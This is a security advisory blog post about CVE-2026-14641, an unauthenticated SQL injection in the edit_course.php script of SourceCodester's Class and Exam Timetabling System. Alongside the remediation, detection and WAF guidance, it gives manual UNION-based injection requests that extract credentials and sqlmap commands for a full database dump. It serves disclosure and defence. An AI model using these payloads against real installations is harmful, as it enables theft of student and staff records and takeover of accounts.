Skip to main content
COSMICBYTEZLABS
NewsSecurityHOWTOsToolsTraining
StudyProjectsNewsletterHire MeAbout
Subscribe

Press Enter to search or Esc to close

News
Security
HOWTOs
Tools
Training
Study
Projects
Newsletter
Hire Me
About
RSS Feed
Reading List
Subscribe

Stay in the Loop

Get the latest security alerts, tutorials, and tech insights delivered to your inbox.

Subscribe NowFree forever. No spam.
COSMICBYTEZLABS

Your trusted source for IT intelligence, cybersecurity insights, and hands-on technical guides.

1794+ Articles
149+ Guides

CONTENT

  • Latest News
  • Security Alerts
  • HOWTOs
  • Checklists
  • Projects
  • Exam Prep

RESOURCES

  • Search
  • Browse Tags
  • Newsletter Archive
  • Reading List
  • RSS Feed

COMPANY

  • About Us
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CosmicBytez Labs. All rights reserved.

System Status: Operational
  1. Home
  2. Security
  3. CVE-2026-14641: Remote SQL Injection in SourceCodester Class and Exam Timetabling System
CVE-2026-14641: Remote SQL Injection in SourceCodester Class and Exam Timetabling System
SECURITYHIGHCVE-2026-14641

CVE-2026-14641: Remote SQL Injection in SourceCodester Class and Exam Timetabling System

A high-severity SQL injection vulnerability in SourceCodester's Class and Exam Timetabling System 1.0 allows unauthenticated remote attackers to dump the full database by manipulating the ID parameter in edit_course.php. A public exploit PoC is available.

Dylan H.

Security Team

July 5, 2026
4 min read

Affected Products

  • SourceCodester Class and Exam Timetabling System 1.0
  • /edit_course.php — ID parameter
  • PHP/MySQL web applications on shared hosting

Executive Summary

CVE-2026-14641 is a high-severity SQL injection vulnerability in SourceCodester's Class and Exam Timetabling System 1.0. The edit_course.php file passes the ID GET parameter directly into a SQL query without sanitization, allowing any unauthenticated remote attacker to extract the full database contents. A public exploit proof-of-concept is available, making exploitation trivial.

CVSS Score: 7.3 (High)

Educational institutions deploying SourceCodester applications should audit all installations immediately — student records, faculty credentials, and timetable data are at risk.


Vulnerability Overview

Root Cause

The edit_course.php script constructs a raw SQL query using the user-supplied id parameter with no parameterized queries or escaping:

// Vulnerable pattern (simplified)
$id = $_GET['id'];
$query = "SELECT * FROM courses WHERE id = $id";
$result = mysqli_query($conn, $query);

No authentication check precedes the query — the endpoint is accessible without logging in.

Attack Surface

ComponentDetail
EndpointGET /edit_course.php?id=<payload>
Auth RequiredNone — fully unauthenticated
Injection TypeUNION-based and error-based SQL injection
DatabaseMySQL (typical SourceCodester stack)
ImpactFull database dump including credentials, PII, timetable data
Public PoCYes — available on exploit databases

Attack Chain

1. Attacker discovers exposed SourceCodester timetabling installation
2. Sends malformed GET request to /edit_course.php with SQL payload in id=
3. Application passes raw input into MySQL query
4. UNION SELECT extracts user table (usernames, password hashes)
5. Attacker cracks MD5 hashes offline (commonly used in SourceCodester apps)
6. Logs in as administrator — full application takeover

Technical Details

Manual Exploitation Example

# Test for SQL injection
GET /edit_course.php?id=1'
# If error-based: MySQL error returned in response

# Determine column count
GET /edit_course.php?id=1 ORDER BY 5--

# Extract database version and current user
GET /edit_course.php?id=-1 UNION SELECT 1,version(),user(),4,5--

# Dump user credentials
GET /edit_course.php?id=-1 UNION SELECT 1,username,password,4,5 FROM users--

Automated Exploitation with sqlmap

# Full database enumeration (for authorized testing only)
sqlmap -u "http://target/edit_course.php?id=1" \
  --dbs \
  --batch \
  --level=3 \
  --risk=2
 
# Dump all tables from identified database
sqlmap -u "http://target/edit_course.php?id=1" \
  -D timetabling_db \
  --dump-all \
  --batch

Typical Schema Targets

SourceCodester Timetabling System commonly contains:

TableSensitive Data
usersUsernames, MD5 password hashes, email addresses
coursesCourse names, codes, scheduling data
classesClass assignments, faculty mapping
subjectsCurriculum information

Affected Versions

VersionStatus
Class and Exam Timetabling System 1.0Vulnerable
No patch available from vendor at time of disclosureMonitor upstream

SourceCodester is a PHP script marketplace — many of their products share similar vulnerable coding patterns. Check for SQL injection in all input parameters across the application.


Remediation

Fix: Use Prepared Statements (MySQLi)

// SECURE: Parameterized query
$stmt = $conn->prepare("SELECT * FROM courses WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);  // "i" = integer type enforcement
$stmt->execute();
$result = $stmt->get_result();

Fix: Use PDO with Named Parameters

// SECURE: PDO prepared statement
$stmt = $pdo->prepare("SELECT * FROM courses WHERE id = :id");
$stmt->execute([':id' => (int) $_GET['id']]);
$rows = $stmt->fetchAll(PDO::FETCH_ASSOC);

Additional Hardening

  • Add authentication to all admin/edit endpoints — edit_course.php should require a valid session
  • Enforce integer casting for numeric parameters: $id = (int) $_GET['id'];
  • Remove or disable public-facing installations of development/demo codebases
  • Enable MySQL's sql_mode=STRICT_ALL_TABLES to reduce error information leakage

Detection

Identify SQL Injection Attempts in Web Logs

# Search for common SQLi patterns in access logs
grep -E "edit_course\.php.*id=.*(%27|'|UNION|SELECT|ORDER BY)" \
  /var/log/apache2/access.log

Database Audit Query

-- Check for recent unexpected queries (if MySQL slow query log is enabled)
SELECT * FROM mysql.slow_log
WHERE sql_text LIKE '%UNION%SELECT%'
ORDER BY start_time DESC
LIMIT 20;

WAF Rule (ModSecurity)

SecRule ARGS:id "@detectSQLi" \
    "id:2026146410,phase:2,deny,status:403,\
    msg:'CVE-2026-14641 SQL Injection Attempt',\
    logdata:'Matched injection pattern'"

References

  • NVD — CVE-2026-14641
  • SourceCodester
  • OWASP SQL Injection Prevention Cheat Sheet

Related Reading

  • CVE-2026-14642: SQL Injection in edit_class2.php — Same Timetabling System
  • CVE-2026-14635: Unrestricted File Upload RCE in CodeIgniter Ecommerce Bootstrap
#CVE#SQL Injection#SourceCodester#PHP#MySQL#High#Database

Related Articles

CVE-2026-14642: Remote SQL Injection in SourceCodester Timetabling System edit_class2.php

A high-severity SQL injection vulnerability in SourceCodester's Class and Exam Timetabling System 1.0 allows unauthenticated remote attackers to fully compromise the database via the ID parameter in edit_class2.php. A public exploit PoC has been published.

5 min read

CVE-2018-25362: Twitter-Clone SQL Injection via follow.php

Twitter-Clone 1 contains a high-severity SQL injection vulnerability in follow.php that allows attackers to extract sensitive database information through.

4 min read

CVE-2026-14771: SQL Injection in SourceCodester Class and Exam Timetabling System

An unauthenticated remote SQL injection vulnerability in SourceCodester's Class and Exam Timetabling System 1.0 allows attackers to manipulate the id parameter in /edit_exam1.php. No patch is available — apply input sanitization immediately.

3 min read
Back to all Security Alerts